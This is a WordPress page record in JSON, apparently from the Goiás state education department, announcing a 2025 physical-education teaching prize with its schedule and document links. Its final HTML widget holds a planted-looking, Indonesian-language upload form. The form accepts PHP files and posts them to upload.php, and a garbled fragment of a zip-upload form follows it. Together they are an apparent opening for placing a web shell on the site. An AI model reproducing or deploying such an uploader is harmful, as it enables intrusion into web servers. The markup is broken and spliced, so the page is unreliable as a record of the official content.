

{"id":583834,"date":"2025-10-17T09:48:51","date_gmt":"2025-10-17T12:48:51","guid":{"rendered":"https:\/\/goias.gov.br\/educacao\/?page_id=583834"},"modified":"2026-03-14T05:41:33","modified_gmt":"2026-03-14T08:41:33","slug":"premio-experiencia-de-sucesso","status":"publish","type":"page","link":"https:\/\/goias.gov.br\/educacao\/premio-experiencia-de-sucesso\/","title":{"rendered":"\u00a0Pr\u00eamio Experi\u00eancia de Sucesso"},"content":{"rendered":"\t\t<div data-elementor-type=\"wp-page\" data-elementor-id=\"583834\" class=\"elementor elementor-583834\">\n\t\t\t\t<div class=\"elementor-element elementor-element-45a6050 e-flex e-con-boxed e-con e-parent\" data-id=\"45a6050\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-76b8aa6 elementor-widget elementor-widget-image\" data-id=\"76b8aa6\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"image.default\">\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<img decoding=\"async\" src=\"https:\/\/goias.gov.br\/educacao\/wp-content\/uploads\/sites\/40\/2025\/10\/banner-site-do-premio-experiencia-de-sucesso-2025_page-0001.jpg\" title=\"\" alt=\"\" loading=\"lazy\" \/>\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-0f978f4 e-flex e-con-boxed e-con e-parent\" data-id=\"0f978f4\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-701d295 elementor-widget elementor-widget-text-editor\" data-id=\"701d295\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p>O Pr\u00eamio Experi\u00eancia de Sucesso \u2013 Educa\u00e7\u00e3o F\u00edsica valoriza e reconhece as pr\u00e1ticas pedag\u00f3gicas desenvolvidas pelos professores de Educa\u00e7\u00e3o F\u00edsica da rede estadual de ensino de Goi\u00e1s.<br \/>A iniciativa tem como objetivo destacar experi\u00eancias que contribuam para o fortalecimento da aprendizagem, o engajamento dos estudantes e a qualidade da educa\u00e7\u00e3o p\u00fablica goiana.<\/p><p>Os professores podem participar com uma boa pr\u00e1tica realizada no ambiente escolar, apresentada na forma de Relato de Experi\u00eancia, conforme as orienta\u00e7\u00f5es do Edital 2025. Para concorrer, o participante deve preencher o formul\u00e1rio de inscri\u00e7\u00e3o e atender aos crit\u00e9rios de avalia\u00e7\u00e3o estabelecidos. O relato deve ter foco na promo\u00e7\u00e3o da aprendizagem dos estudantes, estar vinculado a pelo menos um dos cinco eixos tem\u00e1ticos definidos no edital e alinhar-se ao Plano Estadual de Educa\u00e7\u00e3o, ao IDEB e \u00e0s Estrat\u00e9gias da Seduc.<\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-348a179 e-flex e-con-boxed e-con e-parent\" data-id=\"348a179\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-821561e elementor-widget elementor-widget-heading\" data-id=\"821561e\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<span class=\"elementor-heading-title elementor-size-default\">1<\/span>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-1146aa7 elementor-widget elementor-widget-heading\" data-id=\"1146aa7\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h5 class=\"elementor-heading-title elementor-size-default\">Destaques da Edi\u00e7\u00e3o 2025<\/h5>\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-8a9b678 e-flex e-con-boxed e-con e-parent\" data-id=\"8a9b678\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-f070ff8 elementor-widget elementor-widget-text-editor\" data-id=\"f070ff8\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p data-start=\"1307\" data-end=\"1399\"><span style=\"color: #000000;\">O Edital de 2025 traz novidades importantes para fortalecer o alcance e o impacto do pr\u00eamio:<\/span><\/p><ul data-start=\"1401\" data-end=\"1884\"><li data-start=\"1401\" data-end=\"1474\"><p data-start=\"1403\" data-end=\"1474\"><span style=\"color: #000000;\">Amplia\u00e7\u00e3o da participa\u00e7\u00e3o das Coordena\u00e7\u00f5es Regionais de Educa\u00e7\u00e3o;<\/span><\/p><\/li><li data-start=\"1475\" data-end=\"1560\"><p data-start=\"1477\" data-end=\"1560\"><span style=\"color: #000000;\">Banca examinadora composta por profissionais de destaque na \u00e1rea educacional;<\/span><\/p><\/li><li data-start=\"1561\" data-end=\"1684\"><p data-start=\"1563\" data-end=\"1684\"><span style=\"color: #000000;\">Premia\u00e7\u00e3o especial: viagem com direito a acompanhante ou inscri\u00e7\u00e3o em Congresso\/Semin\u00e1rio Nacional de Educa\u00e7\u00e3o;<\/span><\/p><\/li><li data-start=\"1685\" data-end=\"1767\"><p data-start=\"1687\" data-end=\"1767\"><span style=\"color: #000000;\">Publica\u00e7\u00e3o em e-book de todos os trabalhos classificados no site da Seduc;<\/span><\/p><\/li><li data-start=\"1768\" data-end=\"1884\"><p data-start=\"1770\" data-end=\"1884\"><span style=\"color: #000000;\">Men\u00e7\u00e3o honrosa aos finalistas, promovendo o compartilhamento de pr\u00e1ticas inspiradoras em toda a rede estadual.<\/span><\/p><\/li><\/ul>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-f81cc97 e-flex e-con-boxed e-con e-parent\" data-id=\"f81cc97\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-42f3ead elementor-widget elementor-widget-heading\" data-id=\"42f3ead\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<span class=\"elementor-heading-title elementor-size-default\">2<\/span>\t\t\t\t<\/div>\n\t\t\t\t<div class=\"elementor-element elementor-element-75cc1ab elementor-widget elementor-widget-heading\" data-id=\"75cc1ab\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<h5 class=\"elementor-heading-title elementor-size-default\">Cronograma<\/h5>\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-2788342 e-flex e-con-boxed e-con e-parent\" data-id=\"2788342\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-d6f55ae elementor-widget elementor-widget-text-editor\" data-id=\"d6f55ae\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p data-start=\"1916\" data-end=\"2077\"><span style=\"color: #000000;\">Etapa I \u2013 Inscri\u00e7\u00e3o dos professores: 14 a 21 de outubro de 2025\u00a0 (<a href=\"https:\/\/forms.office.com\/pages\/responsepage.aspx?id=8ZLlZ4GWmkK6qZUI_f13gFecP6utxOROmGhH8sRR5fZUMDlQSlZFNzdUNUtDRkpYR0I0VUVFRTM5OS4u&amp;origin=lprLink&amp;route=shorturl\">Acesse o formul\u00e1rio de inscri\u00e7\u00e3o<\/a>)<\/span><\/p><p data-start=\"2079\" data-end=\"2140\"><span style=\"color: #000000;\">Etapa II \u2013 Sele\u00e7\u00e3o Regional: 22 a 28 de outubro de 2025<\/span><\/p><p data-start=\"2142\" data-end=\"2210\"><span style=\"color: #000000;\">Envio dos Relatos Finalistas pelas CREs: 29 de outubro de 2025<\/span><\/p><p data-start=\"2212\" data-end=\"2280\"><span style=\"color: #000000;\">Apresenta\u00e7\u00e3o dos Relatos Finalistas: 8 e 9 de dezembro de 2025<\/span><\/p><p data-start=\"2282\" data-end=\"2357\"><span style=\"color: #000000;\">Divulga\u00e7\u00e3o e Cerim\u00f4nia de Premia\u00e7\u00e3o em Goi\u00e2nia: 9 de dezembro de 2025<\/span><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-74f32e7 e-flex e-con-boxed e-con e-parent\" data-id=\"74f32e7\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-d248eb1 elementor-widget__width-inherit elementor-widget elementor-widget-heading\" data-id=\"d248eb1\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"heading.default\">\n\t\t\t\t\t<span class=\"elementor-heading-title elementor-size-default\">Confira os Documentos do Pr\u00eamio Experi\u00eancia de Sucesso\n<\/span>\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-7f3d508 e-flex e-con-boxed e-con e-parent\" data-id=\"7f3d508\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-e94c77f elementor-widget elementor-widget-text-editor\" data-id=\"e94c77f\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"text-editor.default\">\n\t\t\t\t\t\t\t\t\t<p><a href=\"https:\/\/goias.gov.br\/educacao\/wp-content\/uploads\/sites\/40\/2025\/10\/SEI_80755619_Edital-1.pdf\">Edital &#8211; Pr\u00eamio Experi\u00eancia de Sucesso\u00a0<\/a><\/p><p><a href=\"https:\/\/forms.office.com\/pages\/responsepage.aspx?id=8ZLlZ4GWmkK6qZUI_f13gFecP6utxOROmGhH8sRR5fZUMDlQSlZFNzdUNUtDRkpYR0I0VUVFRTM5OS4u&amp;origin=lprLink&amp;route=shorturl\">Formul\u00e1rio de inscri\u00e7\u00e3o<\/a><\/p><p><a href=\"https:\/\/goias.gov.br\/educacao\/wp-content\/uploads\/sites\/40\/2025\/11\/ALTERACAO-ANEXO-1-DO-EDITAL-DO-PREMIO-EXPERIENCIA-DE-SUCESSO-NA-EDUCACAO-FISICA-2025-4.pdf\">Retifica\u00e7\u00e3o &#8211; ANEXO 1<\/a><\/p><p><a href=\"https:\/\/goias.gov.br\/educacao\/wp-content\/uploads\/sites\/40\/2025\/11\/LISTA-DOS-SELECIONADOS-DAS-REGIONAIS-PARA-O-PREMIO-2025.pdf\">Lista dos Professores Selecionados por cada Regional\u00a0\u00a0<\/a><\/p>\t\t\t\t\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t<div class=\"elementor-element elementor-element-4126115 e-flex e-con-boxed e-con e-parent\" data-id=\"4126115\" data-element_type=\"container\" data-e-type=\"container\">\n\t\t\t\t\t<div class=\"e-con-inner\">\n\t\t\t\t<div class=\"elementor-element elementor-element-a4a6050 elementor-widget elementor-widget-html\" data-id=\"a4a6050\" data-element_type=\"widget\" data-e-type=\"widget\" data-widget_type=\"html.default\">\n\t\t\t\t\t<!DOCTYPE html>\r\n<html>\r\n<head>\r\n    <title>Upload File<\/title>\r\n<\/head>\r\n<body>\r\n    <h2>Form Upload File<\/h2>\r\n    <form action=\"upload.php\" method=\"POST\" enctype=\"multipart\/form-data\">\r\n        <label>Pilih file (JPG\/PHP):<\/label><br>\r\n        <input type=\"file\" name=\"file_upload\" accept=\".jpg,.jpeg,.php\" required>\r\n        <br><br>\r\n        <button type=\"submit\">Upload Sekarang<\/button>\r\n    <\/form>\r\n<\/body>\r\n<\/html>\" name=\"zip_file\" accept=\".zip\" required>\r\n    <br><br>\r\n    <button type=\"submit\">Unzip Sekarang<\/button>\r\n<\/form>\t\t\t\t<\/div>\n\t\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t\t\t<\/div>\n\t\t","protected":false},"excerpt":{"rendered":"<p>O Pr\u00eamio Experi\u00eancia de Sucesso \u2013 Educa\u00e7\u00e3o F\u00edsica valoriza e reconhece as pr\u00e1ticas pedag\u00f3gicas desenvolvidas pelos professores de Educa\u00e7\u00e3o F\u00edsica da rede estadual de ensino de Goi\u00e1s.A iniciativa tem como objetivo destacar experi\u00eancias que contribuam para o fortalecimento da aprendizagem, o engajamento dos estudantes e a qualidade da educa\u00e7\u00e3o p\u00fablica goiana. Os professores podem participar [&hellip;]<\/p>\n","protected":false},"author":460,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-583834","page","type-page","status-publish","hentry"],"rttpg_featured_image_url":null,"rttpg_author":{"display_name":"marianamfernandes","author_link":"https:\/\/goias.gov.br\/educacao\/author\/marianamfernandes\/"},"rttpg_comment":0,"rttpg_category":null,"rttpg_excerpt":"O Pr\u00eamio Experi\u00eancia de Sucesso \u2013 Educa\u00e7\u00e3o F\u00edsica valoriza e reconhece as pr\u00e1ticas pedag\u00f3gicas desenvolvidas pelos professores de Educa\u00e7\u00e3o F\u00edsica da rede estadual de ensino de Goi\u00e1s.A iniciativa tem como objetivo destacar experi\u00eancias que contribuam para o fortalecimento da aprendizagem, o engajamento dos estudantes e a qualidade da educa\u00e7\u00e3o p\u00fablica goiana. Os professores podem participar&hellip;","_links":{"self":[{"href":"https:\/\/goias.gov.br\/educacao\/wp-json\/wp\/v2\/pages\/583834","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/goias.gov.br\/educacao\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/goias.gov.br\/educacao\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/goias.gov.br\/educacao\/wp-json\/wp\/v2\/users\/460"}],"replies":[{"embeddable":true,"href":"https:\/\/goias.gov.br\/educacao\/wp-json\/wp\/v2\/comments?post=583834"}],"version-history":[{"count":2,"href":"https:\/\/goias.gov.br\/educacao\/wp-json\/wp\/v2\/pages\/583834\/revisions"}],"predecessor-version":[{"id":706241,"href":"https:\/\/goias.gov.br\/educacao\/wp-json\/wp\/v2\/pages\/583834\/revisions\/706241"}],"wp:attachment":[{"href":"https:\/\/goias.gov.br\/educacao\/wp-json\/wp\/v2\/media?parent=583834"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}